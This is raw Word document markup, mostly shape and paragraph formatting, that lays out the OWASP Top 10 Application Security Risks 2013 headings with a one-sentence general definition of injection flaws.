          <v:shapetype id="polygon30" o:spid="_x0000_m2811" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4194,41115,4257,41097,4318,41075,4376,41048,4433,41018,4487,40983,4538,40945,4586,40903,4632,40857,4674,40809,4712,40758,4747,40704,4777,40647,4804,40589,4826,40528,4844,40465,4856,40401,4864,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,60,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,330,40983,379,41018,430,41048,484,41075,540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6BDD2EE7">
          <v:shape id="WS_polygon30" o:spid="_x0000_s2810" type="#polygon30" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:210.35pt;width:411.85pt;height:49.15pt;z-index:-252027392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1F5D4630">
          <v:shapetype id="polygon44" o:spid="_x0000_m2809" coordsize="41088,4818" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4015c41088,4015,41085,4081,41077,4145,41065,4208,41047,4269,41025,4327,40998,4384,40968,4438,40933,4489,40895,4537,40853,4583,40807,4625,40759,4663,40708,4698,40654,4728,40597,4755,40539,4777,40478,4795,40415,4807,40351,4815,40285,4818l40285,4818,,4818,,4818,,4818,,4818,,,,,,,,,40285,0c40285,,40351,3,40415,11,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,281,40933,329,40968,380,40998,434,41025,491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585A5310">
          <v:shape id="WS_polygon44" o:spid="_x0000_s2808" type="#polygon44" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:274.05pt;width:410.85pt;height:48.15pt;z-index:-252026368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1C316C6C">
          <v:shapetype id="polygon45" o:spid="_x0000_m2807" coordsize="41188,4918" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4065c41138,4065,41135,4131,41127,4195,41115,4258,41097,4319,41075,4377,41048,4434,41018,4488,40983,4539,40945,4587,40903,4633,40857,4675,40809,4713,40758,4748,40704,4778,40647,4805,40589,4827,40528,4845,40465,4857,40401,4865,40335,4868l40335,4868,50,4868,50,4868,50,4868,50,4868,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,61,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,331,40983,379,41018,430,41048,484,41075,541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2F193C62">
          <v:shape id="WS_polygon45" o:spid="_x0000_s2806" type="#polygon45" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:273.55pt;width:411.85pt;height:49.15pt;z-index:-252025344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762E4A93">
          <v:shapetype id="polygon58" o:spid="_x0000_m2805" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4144,41065,4207,41047,4268,41025,4327,40998,4383,40968,4437,40933,4488,40895,4537,40853,4582,40807,4624,40759,4662,40708,4697,40654,4727,40597,4754,40539,4776,40478,4794,40415,4807,40351,4814,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,10,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,280,40933,329,40968,380,40998,434,41025,490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68EFD479">
          <v:shape id="WS_polygon58" o:spid="_x0000_s2804" type="#polygon58" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:337.3pt;width:410.85pt;height:48.15pt;z-index:-252024320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53B71586">
          <v:shapetype id="polygon59" o:spid="_x0000_m2803" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4194,41115,4257,41097,4318,41075,4377,41048,4433,41018,4487,40983,4538,40945,4587,40903,4632,40857,4674,40809,4712,40758,4747,40704,4777,40647,4804,40589,4826,40528,4844,40465,4857,40401,4864,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,60,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,330,40983,379,41018,430,41048,484,41075,540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31C1A147">
          <v:shape id="WS_polygon59" o:spid="_x0000_s2802" type="#polygon59" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:336.8pt;width:411.85pt;height:49.15pt;z-index:-252023296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6C54F456">
          <v:shapetype id="polygon72" o:spid="_x0000_m2801" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4144,41065,4207,41047,4268,41025,4327,40998,4383,40968,4437,40933,4488,40895,4537,40853,4582,40807,4624,40759,4662,40708,4697,40654,4727,40597,4754,40539,4776,40478,4794,40415,4807,40351,4814,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,10,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,280,40933,329,40968,380,40998,434,41025,490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122E7564">
          <v:shape id="WS_polygon72" o:spid="_x0000_s2800" type="#polygon72" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:400.5pt;width:410.85pt;height:48.15pt;z-index:-252022272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1B5A3168">
          <v:shapetype id="polygon73" o:spid="_x0000_m2799" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4194,41115,4257,41097,4318,41075,4377,41048,4433,41018,4487,40983,4538,40945,4587,40903,4632,40857,4674,40809,4712,40758,4747,40704,4777,40647,4804,40589,4826,40528,4844,40465,4857,40401,4864,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,60,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,330,40983,379,41018,430,41048,484,41075,540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6E261F78">
          <v:shape id="WS_polygon73" o:spid="_x0000_s2798" type="#polygon73" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:400pt;width:411.85pt;height:49.15pt;z-index:-252021248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479243BE">
          <v:shapetype id="polygon88" o:spid="_x0000_m2797" coordsize="41088,4818" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4015c41088,4015,41085,4081,41077,4145,41065,4208,41047,4269,41025,4327,40998,4384,40968,4438,40933,4489,40895,4537,40853,4583,40807,4625,40759,4663,40708,4698,40654,4728,40597,4755,40539,4777,40478,4795,40415,4807,40351,4815,40285,4818l40285,4818,,4818,,4818,,4818,,4818,,,,,,,,,40285,0c40285,,40351,3,40415,11,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,281,40933,329,40968,380,40998,434,41025,491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513DA152">
          <v:shape id="WS_polygon88" o:spid="_x0000_s2796" type="#polygon88" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:463.75pt;width:410.85pt;height:48.15pt;z-index:-252020224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4462A3B3">
          <v:shapetype id="polygon89" o:spid="_x0000_m2795" coordsize="41188,4918" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4065c41138,4065,41135,4131,41127,4195,41115,4258,41097,4319,41075,4377,41048,4434,41018,4488,40983,4539,40945,4587,40903,4633,40857,4675,40809,4713,40758,4748,40704,4778,40647,4805,40589,4827,40528,4845,40465,4857,40401,4865,40335,4868l40335,4868,50,4868,50,4868,50,4868,50,4868,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,61,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,331,40983,379,41018,430,41048,484,41075,541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172EECDC">
          <v:shape id="WS_polygon89" o:spid="_x0000_s2794" type="#polygon89" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:463.25pt;width:411.85pt;height:49.15pt;z-index:-252019200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7E417DCC">
          <v:shapetype id="polygon103" o:spid="_x0000_m2793" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4144,41065,4207,41047,4268,41025,4327,40998,4383,40968,4437,40933,4488,40895,4537,40853,4582,40807,4624,40759,4662,40708,4697,40654,4727,40597,4754,40539,4776,40478,4794,40415,4807,40351,4814,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,11,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,281,40933,329,40968,380,40998,434,41025,491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3183FF0F">
          <v:shape id="WS_polygon103" o:spid="_x0000_s2792" type="#polygon103" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:526.95pt;width:410.85pt;height:48.15pt;z-index:-252018176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2FDCB758">
          <v:shapetype id="polygon104" o:spid="_x0000_m2791" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4194,41115,4257,41097,4318,41075,4377,41048,4433,41018,4487,40983,4538,40945,4587,40903,4632,40857,4674,40809,4712,40758,4747,40704,4777,40647,4804,40589,4826,40528,4844,40465,4857,40401,4864,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,61,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,331,40983,379,41018,430,41048,484,41075,541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41727D17">
          <v:shape id="WS_polygon104" o:spid="_x0000_s2790" type="#polygon104" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:526.45pt;width:411.85pt;height:49.15pt;z-index:-252017152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6035B831">
          <v:shapetype id="_x0000_m2789" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4144,41065,4207,41047,4268,41025,4327,40998,4383,40968,4437,40933,4488,40895,4537,40853,4582,40807,4624,40759,4662,40708,4697,40654,4727,40597,4754,40539,4776,40478,4794,40415,4806,40351,4814,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,10,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,280,40933,329,40968,380,40998,434,41025,490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07E80BAB">
          <v:shape id="_x0000_s2788" type="#_x0000_m2789" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:590.2pt;width:410.85pt;height:48.15pt;z-index:-252016128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6C1446C1">
          <v:shapetype id="_x0000_m2787" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4194,41115,4257,41097,4318,41075,4377,41048,4433,41018,4487,40983,4538,40945,4587,40903,4632,40857,4674,40809,4712,40758,4747,40704,4777,40647,4804,40589,4826,40528,4844,40465,4856,40401,4864,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,60,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,330,40983,379,41018,430,41048,484,41075,540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60EB5DB0">
          <v:shape id="_x0000_s2786" type="#_x0000_m2787" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:589.7pt;width:411.85pt;height:49.15pt;z-index:-252015104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40760147">
          <v:shapetype id="_x0000_m2785" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4145,41065,4207,41047,4268,41025,4327,40998,4383,40968,4437,40933,4489,40895,4537,40853,4582,40807,4624,40759,4662,40708,4697,40654,4728,40597,4754,40539,4776,40478,4794,40415,4807,40351,4815,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,11,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,280,40933,329,40968,380,40998,434,41025,490,41047,549,41065,610,41077,673,41085,737,41088,803e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0A1BE08E">
          <v:shape id="_x0000_s2784" type="#_x0000_m2785" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:653.4pt;width:410.85pt;height:48.15pt;z-index:-252014080;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#f2f2f2" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6A82604E">
          <v:shapetype id="_x0000_m2783" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4195,41115,4257,41097,4318,41075,4377,41048,4433,41018,4487,40983,4539,40945,4587,40903,4632,40857,4674,40809,4712,40758,4747,40704,4778,40647,4804,40589,4826,40528,4844,40465,4857,40401,4865,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,61,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,330,40983,379,41018,430,41048,484,41075,540,41097,599,41115,660,41127,723,41135,787,41138,853e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="26B57D6F">
          <v:shape id="_x0000_s2782" type="#_x0000_m2783" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:652.9pt;width:411.85pt;height:49.15pt;z-index:-252013056;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d0d8cf" strokeweight="1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T10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243A090" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="294"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07739E91" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="294"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7996C384" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="294"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D78A8D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="368" w:lineRule="exact"/>
        <w:ind w:left="294" w:firstLine="369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1 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB16C5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="731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F7F7F"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP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Top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10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Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD54B59" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="600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Security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Risks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–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2013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B86FA0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029EFBE2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2831CDC4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="262" w:lineRule="exact"/>
        <w:ind w:firstLine="362"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFA8AE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:firstLine="362"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6E8D7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:firstLine="362"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>into executing unintended commands or accessing data without proper authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F3A79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7EF320E7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="362"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504232E1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="428" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="360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2 – Broken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A6D069" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389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uthentication and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18960A7D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="590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Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D15AE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="298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Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D59DDD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="298"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0315DF1C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="298"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791CF502" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="267" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="223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3 – Cross-Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F044A3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="245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Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A861C2C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="245"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F3A098" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="245"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E64D48B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="396" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="290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4 – Insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A8C93" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="305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Direct Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2FA018" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="415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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D9781" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="415"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4A0116" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="415"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14187EF0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="395" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="310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5 – Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA7DC7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="110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Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154804CD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="110"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ECE738" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="110"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496F1268" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="110"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4521E910" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="286" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="7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6 – Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F6D704" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="504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Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A383E0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="504"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140716E6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="504"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0625F5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="396" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="331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7 – Missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB0EE1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="242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Function Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A6B6B7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="235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ccess Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC504F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="235"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0261F1FF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="235"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028D6A87" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="266" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="247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8 - Cross-Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C7AF1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="156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Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59451502" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="646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(CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A43DF68" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="646"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28DE782B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="461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9 - Using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4C5DC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="74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Components with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27178AA0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="612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Known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2DDFC9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="240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Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EEFCAE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
